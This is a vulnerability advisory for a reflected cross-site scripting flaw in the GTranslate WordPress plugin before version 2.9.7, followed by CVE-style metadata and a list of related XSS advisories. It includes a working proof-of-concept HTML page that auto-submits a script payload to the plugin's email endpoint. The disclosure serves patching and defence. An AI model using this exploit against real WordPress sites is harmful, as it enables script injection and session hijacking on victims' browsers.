GTranslate < 2.9.7 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the body parameter in the url_addon/gtranslate-email.php file before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. Note: exploitation of the issue requires knowledge of the NONCE_SALT and NONCE_KEY

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate-email.php?glang=e1n" id="hack" method="POST">
      <input type="hidden" name="body" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="access_key" value="b4a0efbacac60a7d20cb891f5d656a3f" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Fixed in 2.9.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

90067336-c039-4cbe-aa9f-5eab5d1e1c3d

Timeline

Publicly Published

2022-01-10 (about 1 years ago)

Added

2022-01-10 (about 1 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2022-02-17

Title

Sync iCloud COS < 2.0.1 - Admin+ Stored Cross-Site Scripting

Published

2017-08-18

Title

WPJobBoard <= 4.5.1 - Multiple Cross-Site Scripting (XSS)

Published

2021-10-18

Title

TableOn < 1.0.1 - Reflected Cross-Site Scripting

Published

2021-09-21

Title

Responsive WordPress Slider <= 2.2.0 - Subscriber+ Stored Cross-Site Scripting

Published

2023-05-02

Title

Autoptimize < 3.1.7 - Admin+ Stored Cross-Site Scripting via Settings Import